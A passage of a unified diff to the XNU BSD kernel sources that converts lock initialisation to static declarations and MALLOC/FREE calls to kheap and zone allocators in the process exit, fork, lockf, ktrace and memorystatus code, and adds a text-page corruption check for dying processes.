around current PC. + * This is an attempt to detect and repair faults due to memory + * corruption of text pages. + * + * The goal here is to fixup infrequent memory corruptions due to + * things like aging RAM bit flips. So the approach is to only expect + * to have to fixup one thing per crash. This also limits the amount + * of extra work we cause in case this is a development kernel with an + * active memory stomp happening. 
+ */ + task_t task = proc_task(p); + uintptr_t bt[2]; + int bt_err; + bool user64; + bool was_truncated; + unsigned int frame_count = backtrace_user(bt, 2, &bt_err, &user64, &was_truncated); + + if (bt_err == 0 && frame_count >= 1) { + /* + * First check at the page containing the current PC. + * This passes if the page code signs -or- if we can't figure out + * what is at that address. The latter action is so we continue checking + * previous pages which may be corrupt and caused a wild branch. + */ + kr = revalidate_text_page(task, bt[0]); + + /* No corruption found, check the previous sequential page */ + if (kr == KERN_SUCCESS) { + kr = revalidate_text_page(task, bt[0] - get_task_page_size(task)); + } + + /* Still no corruption found, check the current function's caller */ + if (kr == KERN_SUCCESS) { + if (frame_count > 1 && + atop(bt[0]) != atop(bt[1]) && /* don't recheck PC page */ + atop(bt[0]) - 1 != atop(bt[1])) { /* don't recheck page before */ + kr = revalidate_text_page(task, (vm_map_offset_t)bt[1]); + } + } + + /* + * Log that we found a corruption. + * TBD..figure out how to bubble this up to crash reporter too, + * instead of just the log message. 
+ */ + if (kr != KERN_SUCCESS) { + os_log(OS_LOG_DEFAULT, + "Text page corruption detected in dying process %d\n", p->p_pid); + } + } } skipcheck: @@ -1389,7 +1441,7 @@ proc_exit(proc_t p) } /* check for sysctl zomb lookup */ while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } q->p_listflag |= P_LIST_WAITING; /* @@ -1630,7 +1682,7 @@ proc_exit(proc_t p) pid, exitval, 0, 0, 0); /* check for sysctl zomb lookup */ while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } /* safe to use p as this is a system reap */ p->p_stat = SZOMB; @@ -1843,13 +1895,14 @@ reap_child_locked(proc_t parent, proc_t child, int deadparent, int reparentedtoi child->p_ucred = NOCRED; } - lck_mtx_destroy(&child->p_mlock, proc_mlock_grp); - lck_mtx_destroy(&child->p_ucred_mlock, proc_ucred_mlock_grp); - lck_mtx_destroy(&child->p_fdmlock, proc_fdmlock_grp); + lck_mtx_destroy(&child->p_mlock, &proc_mlock_grp); + lck_mtx_destroy(&child->p_ucred_mlock, &proc_ucred_mlock_grp); + lck_mtx_destroy(&child->p_fdmlock, &proc_fdmlock_grp); #if CONFIG_DTRACE - lck_mtx_destroy(&child->p_dtrace_sprlock, proc_lck_grp); + lck_mtx_destroy(&child->p_dtrace_sprlock, &proc_lck_grp); #endif - lck_spin_destroy(&child->p_slock, proc_slock_grp); + lck_spin_destroy(&child->p_slock, &proc_slock_grp); + lck_rw_destroy(&child->p_dirs_lock, &proc_dirslock_grp); zfree(proc_zone, child); if ((locked == 1) && (droplock == 0)) { @@ -1935,7 +1988,7 @@ loop1: wait4_data->args = uap; thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess); - (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); goto loop1; } p->p_listflag |= P_LIST_WAITING; /* only allow single thread to wait() */ 
@@ -2080,7 +2133,7 @@ loop1: wait4_data->retval = retval; thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess); - if ((error = msleep0((caddr_t)q, proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) { + if ((error = msleep0((caddr_t)q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) { return error; } @@ -2199,7 +2252,7 @@ loop1: * the single return for waited process guarantee. */ if (p->p_listflag & P_LIST_WAITING) { - (void) msleep(&p->p_stat, proc_list_mlock, + (void) msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitidcoll", 0); goto loop1; } @@ -2327,14 +2380,14 @@ loop1: } goto out; } - ASSERT_LCK_MTX_OWNED(proc_list_mlock); + ASSERT_LCK_MTX_OWNED(&proc_list_mlock); /* Not a process we are interested in; go on to next child */ p->p_listflag &= ~P_LIST_WAITING; wakeup(&p->p_stat); } - ASSERT_LCK_MTX_OWNED(proc_list_mlock); + ASSERT_LCK_MTX_OWNED(&proc_list_mlock); /* No child processes that could possibly satisfy the request? */ @@ -2368,7 +2421,7 @@ loop1: waitid_data->args = uap; waitid_data->retval = retval; - if ((error = msleep0(q, proc_list_mlock, + if ((error = msleep0(q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "waitid", 0, waitidcontinue)) != 0) { return error; } @@ -2562,7 +2615,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) } /* check for lookups by zomb sysctl */ while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } q->p_listflag |= P_LIST_WAITING; /* @@ -2725,8 +2778,9 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) zfree(proc_sigacts_zone, p->p_sigacts); p->p_sigacts = NULL; - FREE(p->p_subsystem_root_path, M_SBUF); - p->p_subsystem_root_path = NULL; + if (p->p_subsystem_root_path) { + zfree(ZV_NAMEI, p->p_subsystem_root_path); + } proc_limitdrop(p); @@ -2775,7 +2829,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) proc_list_lock(); 
/* check for lookups by zomb sysctl */ while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } p->p_stat = SZOMB; p->p_listflag |= P_LIST_WAITING; diff --git a/bsd/kern/kern_fork.c b/bsd/kern/kern_fork.c index b9475aed1..e48cffe6d 100644 --- a/bsd/kern/kern_fork.c +++ b/bsd/kern/kern_fork.c @@ -841,12 +841,13 @@ fork_create_child(task_t parent_task, } /* - * Create a new thread for the child process + * Create a new thread for the child process. Pin it and make it immovable. * The new thread is waiting on the event triggered by 'task_clear_return_wait' */ result = thread_create_waiting(child_task, (thread_continue_t)task_wait_to_return, task_get_return_wait_event(child_task), + TH_CREATE_WAITING_OPTION_PINNED | TH_CREATE_WAITING_OPTION_IMMOVABLE, &child_thread); if (result != KERN_SUCCESS) { @@ -1124,13 +1125,14 @@ forkproc_free(proc_t p) /* Update the audit session proc count */ AUDIT_SESSION_PROCEXIT(p); - lck_mtx_destroy(&p->p_mlock, proc_mlock_grp); - lck_mtx_destroy(&p->p_fdmlock, proc_fdmlock_grp); - lck_mtx_destroy(&p->p_ucred_mlock, proc_ucred_mlock_grp); + lck_mtx_destroy(&p->p_mlock, &proc_mlock_grp); + lck_mtx_destroy(&p->p_fdmlock, &proc_fdmlock_grp); + lck_mtx_destroy(&p->p_ucred_mlock, &proc_ucred_mlock_grp); #if CONFIG_DTRACE - lck_mtx_destroy(&p->p_dtrace_sprlock, proc_lck_grp); + lck_mtx_destroy(&p->p_dtrace_sprlock, &proc_lck_grp); #endif - lck_spin_destroy(&p->p_slock, proc_slock_grp); + lck_spin_destroy(&p->p_slock, &proc_slock_grp); + lck_rw_destroy(&p->p_dirs_lock, &proc_dirslock_grp); /* Release the credential reference */ kauth_cred_t tmp_ucred = p->p_ucred; @@ -1153,8 +1155,9 @@ forkproc_free(proc_t p) p->p_sigacts = NULL; zfree(proc_stats_zone, p->p_stats); p->p_stats = NULL; - FREE(p->p_subsystem_root_path, M_SBUF); - p->p_subsystem_root_path = NULL; + if (p->p_subsystem_root_path) { + zfree(ZV_NAMEI, 
p->p_subsystem_root_path); + } proc_checkdeadrefs(p); zfree(proc_zone, p); @@ -1317,13 +1320,14 @@ retry: /* update audit session proc count */ AUDIT_SESSION_PROCNEW(child_proc); - lck_mtx_init(&child_proc->p_mlock, proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&child_proc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr); - lck_mtx_init(&child_proc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr); + lck_mtx_init(&child_proc->p_mlock, &proc_mlock_grp, &proc_lck_attr); + lck_mtx_init(&child_proc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr); + lck_mtx_init(&child_proc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr); #if CONFIG_DTRACE - lck_mtx_init(&child_proc->p_dtrace_sprlock, proc_lck_grp, proc_lck_attr); + lck_mtx_init(&child_proc->p_dtrace_sprlock, &proc_lck_grp, &proc_lck_attr); #endif - lck_spin_init(&child_proc->p_slock, proc_slock_grp, proc_lck_attr); + lck_spin_init(&child_proc->p_slock, &proc_slock_grp, &proc_lck_attr); + lck_rw_init(&child_proc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr); klist_init(&child_proc->p_klist); @@ -1348,7 +1352,6 @@ retry: * * XXX may fail to copy descriptors to child */ - lck_rw_init(&child_proc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr); child_proc->p_fd = fdcopy(parent_proc, parent_uthread->uu_cdir); #if SYSV_SHM @@ -1462,7 +1465,9 @@ retry: if (parent_proc->p_subsystem_root_path) { size_t parent_length = strlen(parent_proc->p_subsystem_root_path) + 1; - MALLOC(child_proc->p_subsystem_root_path, char *, parent_length, M_SBUF, M_WAITOK | M_ZERO); + assert(parent_length <= MAXPATHLEN); + child_proc->p_subsystem_root_path = zalloc_flags(ZV_NAMEI, + Z_WAITOK | Z_ZERO); memcpy(child_proc->p_subsystem_root_path, parent_proc->p_subsystem_root_path, parent_length); } @@ -1473,7 +1478,7 @@ bad: void proc_lock(proc_t p) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); lck_mtx_lock(&p->p_mlock); } @@ -1486,7 +1491,7 @@ proc_unlock(proc_t p) 
void proc_spinlock(proc_t p) { - lck_spin_lock_grp(&p->p_slock, proc_slock_grp); + lck_spin_lock_grp(&p->p_slock, &proc_slock_grp); } void @@ -1498,13 +1503,13 @@ proc_spinunlock(proc_t p) void proc_list_lock(void) { - lck_mtx_lock(proc_list_mlock); + lck_mtx_lock(&proc_list_mlock); } void proc_list_unlock(void) { - lck_mtx_unlock(proc_list_mlock); + lck_mtx_unlock(&proc_list_mlock); } void @@ -1634,7 +1639,6 @@ uthread_cleanup_name(void *uthread) void uthread_cleanup(task_t task, void *uthread, void * bsd_info) { - struct _select *sel; uthread_t uth = (uthread_t)uthread; proc_t p = (proc_t)bsd_info; @@ -1669,12 +1673,8 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info) kqueue_threadreq_unbind(p, uth->uu_kqr_bound); } - sel = &uth->uu_select; - /* cleanup the select bit space */ - if (sel->nbytes) { - FREE(sel->ibits, M_TEMP); - FREE(sel->obits, M_TEMP); - sel->nbytes = 0; + if (uth->uu_select.nbytes) { + select_cleanup_uthread(&uth->uu_select); } if (uth->uu_cdir) { @@ -1686,7 +1686,7 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info) if (waitq_set_is_valid(uth->uu_wqset)) { waitq_set_deinit(uth->uu_wqset); } - FREE(uth->uu_wqset, M_SELECT); + kheap_free(KHEAP_DEFAULT, uth->uu_wqset, uth->uu_wqstate_sz); uth->uu_wqset = NULL; uth->uu_wqstate_sz = 0; } diff --git a/bsd/kern/kern_guarded.c b/bsd/kern/kern_guarded.c index 6827a927f..8fc2889fd 100644 --- a/bsd/kern/kern_guarded.c +++ b/bsd/kern/kern_guarded.c @@ -1006,8 +1006,8 @@ free_vgo(struct vng_owner *vgo) } static int label_slot; -static lck_rw_t llock; -static lck_grp_t *llock_grp; +static LCK_GRP_DECLARE(llock_grp, VNG_POLICY_NAME); +static LCK_RW_DECLARE(llock, &llock_grp); static __inline void * vng_lbl_get(struct label *label) @@ -1413,7 +1413,9 @@ vng_guard_violation(const struct vng_info *vgi, if (vng_policy_flags & kVNG_POLICY_EXC_CORPSE) { char *path; int len = MAXPATHLEN; - MALLOC(path, char *, len, M_TEMP, M_WAITOK); + + path = zalloc(ZV_NAMEI); + os_reason_t r = NULL; if 
(NULL != path) { vn_getpath(vp, path, &len); @@ -1425,9 +1427,8 @@ vng_guard_violation(const struct vng_info *vgi, if (NULL != r) { os_reason_free(r); } - if (NULL != path) { - FREE(path, M_TEMP); - } + + zfree(ZV_NAMEI, path); } else { thread_t t = current_thread(); thread_guard_violation(t, code, subcode, TRUE); @@ -1623,13 +1624,6 @@ vng_vnode_check_open(kauth_cred_t cred, * Configuration gorp */ -static void -vng_init(struct mac_policy_conf *mpc) -{ - llock_grp = lck_grp_alloc_init(mpc->mpc_name, LCK_GRP_ATTR_NULL); - lck_rw_init(&llock, llock_grp, LCK_ATTR_NULL); -} - SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = { .mpo_file_label_destroy = vng_file_label_destroy, @@ -1642,7 +1636,6 @@ SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = { .mpo_vnode_check_open = vng_vnode_check_open, .mpo_policy_syscall = vng_policy_syscall, - .mpo_policy_init = vng_init, }; static const char *vng_labelnames[] = { diff --git a/bsd/kern/kern_kpc.c b/bsd/kern/kern_kpc.c index e60018e65..55dc92a99 100644 --- a/bsd/kern/kern_kpc.c +++ b/bsd/kern/kern_kpc.c @@ -62,9 +62,8 @@ typedef int (*setint_t)(int); static int kpc_initted = 0; -static lck_grp_attr_t *sysctl_lckgrp_attr = NULL; -static lck_grp_t *sysctl_lckgrp = NULL; -static lck_mtx_t sysctl_lock; +static LCK_GRP_DECLARE(sysctl_lckgrp, "kpc"); +static LCK_MTX_DECLARE(sysctl_lock, &sysctl_lckgrp); /* * Another element is needed to hold the CPU number when getting counter values. 
@@ -76,10 +75,6 @@ typedef int (*setget_func_t)(int); void kpc_init(void) { - sysctl_lckgrp_attr = lck_grp_attr_alloc_init(); - sysctl_lckgrp = lck_grp_alloc_init("kpc", sysctl_lckgrp_attr); - lck_mtx_init(&sysctl_lock, sysctl_lckgrp, LCK_ATTR_NULL); - kpc_arch_init(); kpc_initted = 1; diff --git a/bsd/kern/kern_ktrace.c b/bsd/kern/kern_ktrace.c index c36219ae7..3f2a7ef0f 100644 --- a/bsd/kern/kern_ktrace.c +++ b/bsd/kern/kern_ktrace.c @@ -70,7 +70,8 @@ char *proc_name_address(void *p); kern_return_t ktrace_background_available_notify_user(void); -static lck_mtx_t *ktrace_mtx; +static LCK_GRP_DECLARE(ktrace_grp, "ktrace"); +static LCK_MTX_DECLARE(ktrace_mtx, &ktrace_grp); /* * The overall state of ktrace, whether it is unconfigured, in foreground mode, @@ -148,7 +149,7 @@ void ktrace_lock(void) { if (!ktrace_single_threaded) { - lck_mtx_lock(ktrace_mtx); + lck_mtx_lock(&ktrace_mtx); } } @@ -156,7 +157,7 @@ void ktrace_unlock(void) { if (!ktrace_single_threaded) { - lck_mtx_unlock(ktrace_mtx); + lck_mtx_unlock(&ktrace_mtx); } } @@ -164,7 +165,7 @@ void ktrace_assert_lock_held(void) { if (!ktrace_single_threaded) { - lck_mtx_assert(ktrace_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ktrace_mtx, LCK_MTX_ASSERT_OWNED); } } @@ -548,24 +549,3 @@ out: ktrace_unlock(); return ret; } - -/* This should only be called from the bootstrap thread. 
*/ -void -ktrace_init(void) -{ - static lck_grp_attr_t *lock_grp_attr = NULL; - static lck_grp_t *lock_grp = NULL; - static bool initialized = false; - - if (initialized) { - return; - } - - lock_grp_attr = lck_grp_attr_alloc_init(); - lock_grp = lck_grp_alloc_init("ktrace", lock_grp_attr); - lck_grp_attr_free(lock_grp_attr); - - ktrace_mtx = lck_mtx_alloc_init(lock_grp, LCK_ATTR_NULL); - assert(ktrace_mtx != NULL);; - initialized = true; -} diff --git a/bsd/kern/kern_lockf.c b/bsd/kern/kern_lockf.c index 03f86bef2..18e372d11 100644 --- a/bsd/kern/kern_lockf.c +++ b/bsd/kern/kern_lockf.c @@ -117,7 +117,11 @@ SYSCTL_INT(_debug, OID_AUTO, lockf_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &lockf_de #define LOCKF_DEBUG(mask, ...) /* mask */ #endif /* !LOCKF_DEBUGGING */ -MALLOC_DEFINE(M_LOCKF, "lockf", "Byte-range locking structures"); +/* + * If you need accounting for KM_LOCKF consider using + * ZONE_VIEW_DEFINE to define a view. + */ +#define KM_LOCKF KHEAP_DEFAULT #define NOLOCKF (struct lockf *)0 #define SELF 0x1 @@ -152,15 +156,8 @@ static void lf_boost_blocking_proc(struct lockf *, struct lockf *); static void lf_adjust_assertion(struct lockf *block); #endif /* IMPORTANCE_INHERITANCE */ -static lck_mtx_t lf_dead_lock; -static lck_grp_t *lf_dead_lock_grp; - -void -lf_init(void) -{ - lf_dead_lock_grp = lck_grp_alloc_init("lf_dead_lock", LCK_GRP_ATTR_NULL); - lck_mtx_init(&lf_dead_lock, lf_dead_lock_grp, LCK_ATTR_NULL); -} +static LCK_GRP_DECLARE(lf_dead_lock_grp, "lf_dead_lock"); +static LCK_MTX_DECLARE(lf_dead_lock, &lf_dead_lock_grp); /* * lf_advlock @@ -285,7 +282,7 @@ lf_advlock(struct vnop_advlock_args *ap) /* * Create the lockf structure */ - MALLOC(lock, struct lockf *, sizeof *lock, M_LOCKF, M_WAITOK); + lock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK); if (lock == NULL) { return ENOLCK; } @@ -336,21 +333,21 @@ lf_advlock(struct vnop_advlock_args *ap) case F_UNLCK: error = lf_clearlock(lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, 
sizeof(struct lockf)); break; case F_GETLK: error = lf_getlock(lock, fl, -1); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); break; case F_GETLKPID: error = lf_getlock(lock, fl, fl->l_pid); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); break; default: - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); error = EINVAL; break; } @@ -451,7 +448,7 @@ lf_coalesce_adjacent(struct lockf *lock) lf_move_blocked(lock, adjacent); - FREE(adjacent, M_LOCKF); + kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf)); continue; } /* If the lock starts adjacent to us, we can coalesce it */ @@ -466,7 +463,7 @@ lf_coalesce_adjacent(struct lockf *lock) lf_move_blocked(lock, adjacent); - FREE(adjacent, M_LOCKF); + kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf)); continue; } @@ -538,7 +535,7 @@ scan: */ if ((lock->lf_flags & F_WAIT) == 0) { DTRACE_FSINFO(advlock__nowait, vnode_t, vp); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return EAGAIN; } @@ -676,7 +673,7 @@ scan: LOCKF_DEBUG(LF_DBG_DEADLOCK, "lock %p which is me, so EDEADLK\n", lock); proc_unlock(wproc); lck_mtx_unlock(&lf_dead_lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return EDEADLK; } } @@ -695,7 +692,7 @@ scan: lock->lf_type == F_WRLCK) { lock->lf_type = F_UNLCK; if ((error = lf_clearlock(lock)) != 0) { - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return error; } lock->lf_type = F_WRLCK; @@ -799,7 +796,7 @@ scan: if (!TAILQ_EMPTY(&lock->lf_blkhd)) { lf_wakelock(lock, TRUE); } - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); /* Return ETIMEDOUT if timeout occoured. 
*/ if (error == EWOULDBLOCK) { error = ETIMEDOUT; @@ -852,7 +849,7 @@ scan: } overlap->lf_type = lock->lf_type; lf_move_blocked(overlap, lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); lock = overlap; /* for lf_coalesce_adjacent() */ break; @@ -862,7 +859,7 @@ scan: */ if (overlap->lf_type == lock->lf_type) { lf_move_blocked(overlap, lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); lock = overlap; /* for lf_coalesce_adjacent() */ break; } @@ -877,7 +874,7 @@ scan: * resource shortage. */ if (lf_split(overlap, lock)) { - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return ENOLCK; } } @@ -906,7 +903,7 @@ scan: } else { *prev = overlap->lf_next; } - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); continue; case OVERLAP_STARTS_BEFORE_LOCK: @@ -1000,7 +997,7 @@ lf_clearlock(struct lockf *unlock) case OVERLAP_EQUALS_LOCK: *prev = overlap->lf_next; - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); break; case OVERLAP_CONTAINS_LOCK: /* split it */ @@ -1021,7 +1018,7 @@ lf_clearlock(struct lockf *unlock) case OVERLAP_CONTAINED_BY_LOCK: *prev = overlap->lf_next; lf = overlap->lf_next; - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); continue; case OVERLAP_STARTS_BEFORE_LOCK: @@ -1346,7 +1343,7 @@ lf_split(struct lockf *lock1, struct lockf *lock2) * Make a new lock consisting of the last part of * the encompassing lock */ - MALLOC(splitlock, struct lockf *, sizeof *splitlock, M_LOCKF, M_WAITOK); + splitlock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK); if (splitlock == NULL) { return ENOLCK; } @@ -1465,13 +1462,13 @@ lf_print(const char *tag, struct lockf *lock) lock->lf_type == F_RDLCK ? "shared" : lock->lf_type == F_WRLCK ? "exclusive" : lock->lf_type == F_UNLCK ? 
"unlock" : "unknown", - (intmax_t)lock->lf_start, (intmax_t)lock->lf_end); + (uint64_t)lock->lf_start, (uint64_t)lock->lf_end); } else { printf(" %s, start 0x%016llx, end 0x%016llx", lock->lf_type == F_RDLCK ? "shared" : lock->lf_type == F_WRLCK ? "exclusive" : lock->lf_type == F_UNLCK ? "unlock" : "unknown", - (intmax_t)lock->lf_start, (intmax_t)lock->lf_end); + (uint64_t)lock->lf_start, (uint64_t)lock->lf_end); } if (!TAILQ_EMPTY(&lock->lf_blkhd)) { printf(" block %p\n", (void *)TAILQ_FIRST(&lock->lf_blkhd)); @@ -1519,7 +1516,7 @@ lf_printlist(const char *tag, struct lockf *lock) lf->lf_type == F_RDLCK ? "shared" : lf->lf_type == F_WRLCK ? "exclusive" : lf->lf_type == F_UNLCK ? "unlock" : - "unknown", (intmax_t)lf->lf_start, (intmax_t)lf->lf_end); + "unknown", (uint64_t)lf->lf_start, (uint64_t)lf->lf_end); TAILQ_FOREACH(blk, &lf->lf_blkhd, lf_block) { printf("\n\t\tlock request %p for ", (void *)blk); if (blk->lf_flags & F_POSIX) { @@ -1535,8 +1532,8 @@ lf_printlist(const char *tag, struct lockf *lock) blk->lf_type == F_RDLCK ? "shared" : blk->lf_type == F_WRLCK ? "exclusive" : blk->lf_type == F_UNLCK ? "unlock" : - "unknown", (intmax_t)blk->lf_start, - (intmax_t)blk->lf_end); + "unknown", (uint64_t)blk->lf_start, + (uint64_t)blk->lf_end); if (!TAILQ_EMPTY(&blk->lf_blkhd)) { panic("lf_printlist: bad list"); } diff --git a/bsd/kern/kern_memorystatus.c b/bsd/kern/kern_memorystatus.c index 69e5f6d69..677c73b03 100644 --- a/bsd/kern/kern_memorystatus.c +++ b/bsd/kern/kern_memorystatus.c @@ -253,13 +253,13 @@ uint64_t memorystatus_jetsam_snapshot_timeout = 0; #if DEVELOPMENT || DEBUG /* * On development and debug kernels, we allow one pid to take ownership - * of the memorystatus snapshot (via memorystatus_control). - * If there's an owner, then only they may consume the snapshot. - * This is used when testing the snapshot interface to avoid racing with other - * processes on the system that consume snapshots. 
+ * of some memorystatus data structures for testing purposes (via memorystatus_control). + * If there's an owner, then only they may consume the jetsam snapshot & set freezer probabilities. + * This is used when testing these interfaces to avoid racing with other + * processes on the system that typically use them (namely OSAnalytics & dasd). */ -static pid_t memorystatus_snapshot_owner = 0; -SYSCTL_INT(_kern, OID_AUTO, memorystatus_snapshot_owner, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_snapshot_owner, 0, ""); +static pid_t memorystatus_testing_pid = 0; +SYSCTL_INT(_kern, OID_AUTO, memorystatus_testing_pid, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_testing_pid, 0, ""); #endif /* DEVELOPMENT || DEBUG */ static void memorystatus_init_jetsam_snapshot_header(memorystatus_jetsam_snapshot_t *snapshot); @@ -276,9 +276,10 @@ SYSCTL_INT(_kern, OID_AUTO, entitled_max_task_pmem, CTLTYPE_INT | CTLFLAG_RW | C #endif /* DEVELOPMENT || DEBUG */ #endif /* __arm64__ */ -static lck_grp_attr_t *memorystatus_jetsam_fg_band_lock_grp_attr; -static lck_grp_t *memorystatus_jetsam_fg_band_lock_grp; -lck_mtx_t memorystatus_jetsam_fg_band_lock; +static LCK_GRP_DECLARE(memorystatus_jetsam_fg_band_lock_grp, + "memorystatus_jetsam_fg_band"); +LCK_MTX_DECLARE(memorystatus_jetsam_fg_band_lock, + &memorystatus_jetsam_fg_band_lock_grp); /* Idle guard handling */ @@ -598,7 +599,7 @@ memorystatus_raise_memlimit(proc_t p, int new_memlimit_active, int new_memlimit_ int memlimit_mb_active = 0, memlimit_mb_inactive = 0; boolean_t memlimit_active_is_fatal = FALSE, memlimit_inactive_is_fatal = FALSE, use_active_limit = FALSE; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (p->p_memstat_memlimit_active > 0) { memlimit_mb_active = p->p_memstat_memlimit_active; @@ -918,9 +919,8 @@ int32_t max_kill_priority = JETSAM_PRIORITY_IDLE; #if DEVELOPMENT || DEBUG -lck_grp_attr_t 
*disconnect_page_mappings_lck_grp_attr; -lck_grp_t *disconnect_page_mappings_lck_grp; -static lck_mtx_t disconnect_page_mappings_mutex; +static LCK_GRP_DECLARE(disconnect_page_mappings_lck_grp, "disconnect_page_mappings"); +static LCK_MTX_DECLARE(disconnect_page_mappings_mutex, &disconnect_page_mappings_lck_grp); extern bool kill_on_no_paging_space; #endif /* DEVELOPMENT || DEBUG */ @@ -1174,7 +1174,7 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_disconnect_page_mappings, CTLTYPE_INT static void memorystatus_sort_bucket_locked(unsigned int bucket_index, int sort_order) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (memstat_bucket[bucket_index].count == 0) { return; } @@ -1406,21 +1406,11 @@ memorystatus_init(void) #endif #if DEVELOPMENT || DEBUG - disconnect_page_mappings_lck_grp_attr = lck_grp_attr_alloc_init(); - disconnect_page_mappings_lck_grp = lck_grp_alloc_init("disconnect_page_mappings", disconnect_page_mappings_lck_grp_attr); - - lck_mtx_init(&disconnect_page_mappings_mutex, disconnect_page_mappings_lck_grp, NULL); - if (kill_on_no_paging_space) { max_kill_priority = JETSAM_PRIORITY_MAX; } #endif - memorystatus_jetsam_fg_band_lock_grp_attr = lck_grp_attr_alloc_init(); - memorystatus_jetsam_fg_band_lock_grp = - lck_grp_alloc_init("memorystatus_jetsam_fg_band", memorystatus_jetsam_fg_band_lock_grp_attr); - lck_mtx_init(&memorystatus_jetsam_fg_band_lock, memorystatus_jetsam_fg_band_lock_grp, NULL); - /* Init buckets */ for (i = 0; i < MEMSTAT_BUCKET_COUNT; i++) { TAILQ_INIT(&memstat_bucket[i].list); @@ -1625,6 +1615,8 @@ memorystatus_init(void) /* Centralised for the purposes of allowing panic-on-jetsam */ extern void vm_run_compactor(void); +extern void +vm_wake_compactor_swapper(void); /* * The jetsam no frills kill call @@ -1694,7 +1686,17 @@ memorystatus_do_kill(proc_t p, uint32_t cause, os_reason_t jetsam_reason, uint64 KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, 
BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_START, victim_pid, cause, vm_page_free_count, *footprint_of_killed_proc, 0); - vm_run_compactor(); + if (jetsam_reason->osr_code == JETSAM_REASON_VNODE) { + /* + * vnode jetsams are synchronous and not caused by memory pressure. + * Running the compactor on this thread adds significant latency to the filesystem operation + * that triggered this jetsam. + * Kick off compactor thread asynchronously instead. + */ + vm_wake_compactor_swapper(); + } else { + vm_run_compactor(); + } KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_END, victim_pid, cause, vm_page_free_count, 0, 0); @@ -2713,8 +2715,8 @@ memorystatus_remove(proc_t p) #endif #if DEVELOPMENT || DEBUG - if (p->p_pid == memorystatus_snapshot_owner) { - memorystatus_snapshot_owner = 0; + if (p->p_pid == memorystatus_testing_pid) { + 